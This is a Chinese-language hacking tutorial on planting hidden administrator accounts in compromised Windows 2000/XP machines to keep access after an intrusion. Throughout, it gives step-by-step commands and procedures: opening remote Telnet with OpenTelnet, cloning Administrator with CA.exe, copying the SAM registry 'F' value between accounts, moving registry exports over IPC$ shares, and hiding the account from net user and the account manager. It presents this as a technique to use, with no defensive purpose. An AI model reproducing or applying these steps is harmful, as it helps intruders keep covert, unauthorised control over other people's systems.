成功入侵達到目的之後,是不是想再做的點什嗎?哦!得多留個心眼,留下個後門什麼的?可後門木馬程式容易被查殺,還是建立一個隱藏的超級使用者比較安全,在學習借鑒的基礎,經過反覆研究實踐,總結出了如下如下幾種建立隱藏超級使用者的方法。
一、利用帳戶複製工具來建立
Clone Administrator(CA.exe),利用這個工具可以將Administrator的帳號複製為一個指定的普通帳號(此普通帳號必須已經存在)。複製得到的帳號具有和系統內建的Administrator同樣的設定,並且用NET命令或者使用者管理員也發現不了其許可權已經被提升,是一個不錯的ROOT KIT。
現在,我們就來看看如何利用帳戶複製工具在肉雞上建立隱藏的超級使用者。
利用流光、SuperScan等進行掃描,假設已經掃描到一遠程主機的Administrator帳戶,其密碼為123。我們可以使用DameWare Mini Remote Control(簡稱DMRC),在圖形介面(GUI)中來遠端控制遠程主機。也可以使用OpenTelnet.exe工具來開啟遠程主機的TELNET服務,其命令格式為:OpenTelnet.exe //server username password NTLMAuthor telnetport,使用命令:opentelnet //192.XX.XX.2 Administrator "123" 0 99,呵呵,沒想這麼成功容易就開啟肉雞的TELNET吧!接著使用命令:Telnet 192.XX.XX.2 99,輸入帳戶及密碼,成功擷取一SHELL。
首先想辦法查看一下有哪些使用者被細心的管理員禁止,一般情況下,有些管理員出於安全考慮,通常會將guest禁用,當然也會禁用其他使用者。在圖形介面下,非常容易識別,只要在帳戶管理器中就可以看到被禁用的帳戶上有一個紅叉。但在命令列狀態下,只能使用命令:“net user 使用者名稱”一個一個來查看使用者是否被禁用。如果懶得這樣麻煩,可自行建立一個新的帳戶,命令為:“Net user hacker$ youkou /add”,然後使用命令:“Net user hacker$ /active:no”來停用此帳戶。
斷開與遠程主機的串連,用小榕的超級使用者複製程式CA.exe,將被禁用的使用者hacker$複製成超級使用者,命令為:CA.EXE //192.XX.XX.2 Administrator 123 hacker$ youkou,成功!
這時,hacker$就成為了超級使用者,並有具有和Administrator同樣的設定(案頭、菜單等等)。但還是得檢查一下,用CCA.exe,命令如下:cca //192.XX.XX.2 administrator 123。
看到這一行返回資訊沒有?“[hacker$] AS SAME AS [Administrator]”,說明hacker$帳戶和Administrator相同,複製成功。
二、圖形介面建隱藏超級使用者
恐怕我們最熟悉的就是在圖形介面下進行操作了,這對於在本機電腦、3389終端服務肉雞或使用DMRC等控制的肉雞上建立隱藏超級使用者 再好不過了。
大家知道嗎?Windows 2000中有兩個登錄編輯程式:Regedit.exe和Regedt32.exe,Windows XP中Regedit.exe和Regedt32.exe實為一個程式,修改索引值的許可權時在右鍵捷徑功能表中選擇“許可權”來修改。對Regedit.exe我想大家都很熟悉,但卻不能對註冊表的鍵進行使用權限設定,而Regedt32.exe最大的優點就是能夠對註冊表的項鍵設定許可權。Windows NT/2000/XP的帳戶資訊都在註冊表的HKEY_LOCAL_MACHINE/SAM/SAM鍵下,但是除了系統使用者SYSTEM外,其他使用者都沒有許可權查看到其中的資訊,因此首先得用Regedt32.exe對“HKEY_LOCAL_MACHINE/SAM/SAM”鍵設定為“完全控制”許可權。這樣就可以對SAM鍵內的資訊進行讀寫操作。
首先在肉雞中建立一個新的帳戶hacker$,可以在帳戶管理器中建立,也可以使用命令:net user hacker$ 123 /add 來建立。然後通過“開始”菜單中的“運行”,輸入regedt32.exe,點擊“確定”後就開啟了登錄編輯程式。依次展開子鍵HKEY_LOCAL_MACHINE/SAM/SAM,用滑鼠右鍵單擊,在彈出的捷徑功能表中選擇“許可權”項。
在出現的“SAM 許可權”交談視窗中,點擊“添加”將我登入時的帳戶添加到“組或使用者名稱稱”列表中,這裡我是以administrator的身份登入的,所以我就將administrator加入,在下部的許可權功能區設定許可權為“完全控制”。
小提示:最好是添加你登入的帳戶或帳戶所在的組,切莫修改原有的帳戶或組,否則將會帶來一系列不必要的問題。等隱藏超級使用者建好以後,再來這裡將你添加的帳戶刪除即可。
如果還是不能展開子鍵,請關閉後重新開啟,如果是Windows 2000的機器,請關閉這個登錄編輯程式,重新開啟“regedit.exe”。展開子鍵:HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names/hacker$,在其右側視窗中發現其預設值為0x3F1。
下面將hacker$鍵、hacker$對應的項000003F1以及administrator所對應的項000001F4匯出為hacker.reg、3EE.reg和1f4.reg,退出登錄編輯程式。用記事本分別開啟這幾個匯出的檔案進行編輯,將超級使用者對應的項000001F4下的鍵“F”的值複製,並覆蓋hacker$對應的項000003EE下的鍵“F”的值,然後將hacker.reg和3EE.reg合并為hacker.reg。 接下來在命令列下執行net user hacker$ /del將使用者hacker$刪除,最後再將hacker.reg匯入註冊表即可。
現在,隱藏的超級使用者hacker$已經建好了。開啟regedt32.exe,把HKEY_LOCAL_MACHINE/SAM/SAM鍵許可權改回原來的樣子(只要刪除添加的帳戶administrator即可)。
注意:隱藏的超級使用者建好後,就能在帳戶管理器看不到hacker$這個使用者,在命令列用“net user”命令也看不到,但是超級使用者建立以後,就不能再改密碼了,如果用net user命令來改hacker$的密碼的話,那麼在帳戶管理器中將又會看這個隱藏的超級使用者了,而且不能刪除。
三、命令列建立隱藏超級使用者
首先通過使用OpenTelnet.exe工具來開啟遠程主機的TELNET服務,然後TELNET遠程登陸得到一個shell,建立一個新的帳戶,命令為:
net user hacker$ youkou /add,然後就來匯出登錄機碼HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users,運行命令:
regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/,其中/e 是regedit.exe的參數,在HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users這個鍵的一定要以“/”結尾。
斷開TELNET串連,建立IPC會話:net use //192.XX.XX.2/ipc$ "123" /user:"administrator,然後將肉雞上的hacker.reg下載到本機上用記事本開啟進行編輯命令為:copy //192.XX.XX.2/D$/hacker.reg,用記事本編輯,將超級使用者對應的項000001F4下的鍵“F”的值複製,並覆蓋hacker$對應的項000003EE下的鍵“F”的值(hacker$對應的項在不同的機器而不同),編輯好後再上傳:copy hacker.reg //192.XX.XX.2/D$/hacker1.reg 。
再TELNET到遠程主機,使用命令net user hacker$ /del刪除hacker$帳戶,然後把hacker.reg匯入,命令為:regedit.exe /s hacker.reg,其中參數/s表示以安靜模式匯入。這樣就成功建立了一個隱藏的超級使用者。
四、串連遠程肉雞註冊表建立
還有一個比較簡單方便的辦法,就是通過控制台以及登錄編輯程式[檔案] 功能表中的“串連網路註冊表”功能來完成隱藏超級使用者的建立。
通過“開始”菜單中的“運行”,輸入MMC,斷行符號後即開啟了控制台,開啟[檔案] 功能表中的“添加/刪除嵌入式管理單元”(快速鍵CTRL+M),在出現的對話方塊中點擊“添加”按鈕,在出現的“添加獨立嵌入式管理單元”對話方塊中的列表中選擇“本機使用者和組”。
單擊“添加”即彈出“選擇目標機器”對話方塊,選中“另一台電腦”,在其後輸入遠端電腦的IP地址,點擊“完成”。
一路關閉返回至控制台視窗,我們就可對遠端電腦進行組和使用者的管理了,在右側視窗空白處右擊,在彈出的快捷選擇“新使用者”建立一帳戶hacker$吧!
我們知道,regedit.exe、regedt32.exe都有串連網路註冊表的功能,我們可以用regedt32.exe來為遠程主機的登錄機碼設定許可權,用regedit.exe來編輯遠端登錄。匯出相應註冊項,然後進行編輯修改(同上面介紹相似)。
現在在“控制台”中刪除剛建立的帳戶hacker$,然後關閉。然後在登錄編輯程式中通過[檔案] 功能表中的“匯入”功能將上面匯出的檔案匯入即可。
如果遠程主機沒有開啟遠端登錄服務,請自行開啟,因為你一開始就已經擁有其系統管理員帳戶密碼。
五、需注意的幾點事項
1、隱藏的超級使用者建立以後,在帳戶管理器中和命令列下均看不到這個使用者,但這個使用者卻存在。
2、隱藏的超級使用者建立以後,就不能再修改密碼了,因為一旦修改密碼,這個隱藏的超級使用者就會暴露在帳戶管理器中,而且不能刪除。
3、如在本機上建立隱藏的超級使用者時,最好用系統內建的備份工具先備份好註冊表。
想不想在電腦上大顯身手?自己動手試一試吧!
